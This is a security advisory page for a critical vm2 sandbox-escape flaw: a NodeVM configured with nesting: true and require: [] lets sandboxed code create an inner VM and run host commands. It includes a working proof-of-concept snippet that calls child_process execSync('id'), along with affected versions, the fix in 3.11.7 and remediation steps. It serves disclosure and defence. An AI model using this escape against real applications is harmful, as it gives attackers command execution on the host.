GHSA-8hr7-r645-pc6w: Critical severity npm/vm2 vulnerability

Published Oct 1, 2026
·
Updated

Summary

The NodeVM constructor computes hasRealRequireConfig using typeof requireOpts === 'object' && requireOpts !== null, so require: [] bypasses the guard intended to reject nesting without an explicit require configuration. makeResolverFromLegacyOptions() then destructures the array to undefined option fields and returns a resolver containing only NESTINGOVERRIDE.vm2. Any attacker whose JavaScript is executed by a downstream NodeVM configured with {nesting: true, require: []} can load the host vm2 module, create an inner NodeVM with an attacker-selected builtin allowlist, and execute commands as the host process. No equivalent plain-object validation exists in makeResolverFromLegacyOptions().

Array is converted into the vm2-only resolver: https://github.com/patriksimek/vm2/blob/54b54b74a382577f0bcd0538c5bf99acdcd7f53b/lib/resolver-compat.js#L205-L226

Nesting loader returns the host VM constructors: https://github.com/patriksimek/vm2/blob/54b54b74a382577f0bcd0538c5bf99acdcd7f53b/lib/nodevm.js#L640-L645

Proof of Concept

Preconditions:

- The host creates NodeVM with truthy nesting and array-shaped require. - The attacker can supply JavaScript executed by that NodeVM.

javascript 'use strict';

const {NodeVM} = require('./index.js');

const outer = new NodeVM({nesting: true, require: []}); const result = outer.run( const {NodeVM} = require('vm2'); const inner = new NodeVM({require: {builtin: ['childprocess']}}); module.exports = inner.run( "module.exports = require('childprocess').execSync('id').toString()" ); );

console.log(result);

text uid=1000(lohar) gid=1000(lohar) groups=1000(lohar)

The hasRealRequireConfig guard fails open because it returns true for arrays, although arrays are not VMRequire configuration objects. makeResolverFromLegacyOptions() applies object destructuring to the array, obtains undefined builtin and external values, merges NESTINGOVERRIDE, and returns before any external-module control is relevant. Outer builtin restrictions do not constrain the attacker-created inner NodeVM, whose require configuration is selected inside the sandbox.

Failed shape check: https://github.com/patriksimek/vm2/blob/54b54b74a382577f0bcd0538c5bf99acdcd7f53b/lib/nodevm.js#L304-L307

Impact

An attacker can execute arbitrary commands with the host Node.js process privileges, including reading secrets, modifying files, and accessing the host network. GHSA-m4wx-m65x-ghrr covers the same nesting primitive but does not cover array-shaped require values and incorrectly identifies 3.11.4 as patched.

Exploitation is limited to downstream applications that enable nesting and pass the malformed array configuration.

Affected Software

1 affected componentFixes available
npm/vm2>=3.11.4<=3.11.6
3.11.7

Remediation

Recommended actions to resolve this vulnerability, in priority order.

  1. Upgrade

    Upgrade npm/vm2 to a version that resolves this vulnerability.

    Fixed in 3.11.7
  2. Configuration

    Disable the NodeVM nesting option; the exploit requires nesting: true, particularly when combined with an array-shaped require configuration such as require: [].

    vm2 NodeVM nesting = false

Event History

Oct 1, 2026
Advisory Published
via GitHub·03:34 PM
Data Sourced
via GitHub·03:34 PM
DescriptionSeverityWeaknessAffected Software

Frequently Asked Questions

1

Which deployments are exposed?

Deployments are exposed when they create a NodeVM with truthy nesting enabled and provide require as an array, such as require: []. The issue is specific to this configuration path.

2

What must an attacker be able to do?

The attacker must be able to supply JavaScript that is executed by the affected downstream NodeVM. No privileges or user interaction are identified in the provided data.

3

How can I identify an affected configuration?

Review NodeVM construction options for nesting set to a truthy value together with an array-shaped require value. A require: [] setting matches the described vulnerable case.

4

What can be changed while a permanent fix is being applied?

Avoid the combination of enabled nesting and an array-shaped require configuration. The described guard expects an explicit require configuration represented as a non-null object rather than an array.

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203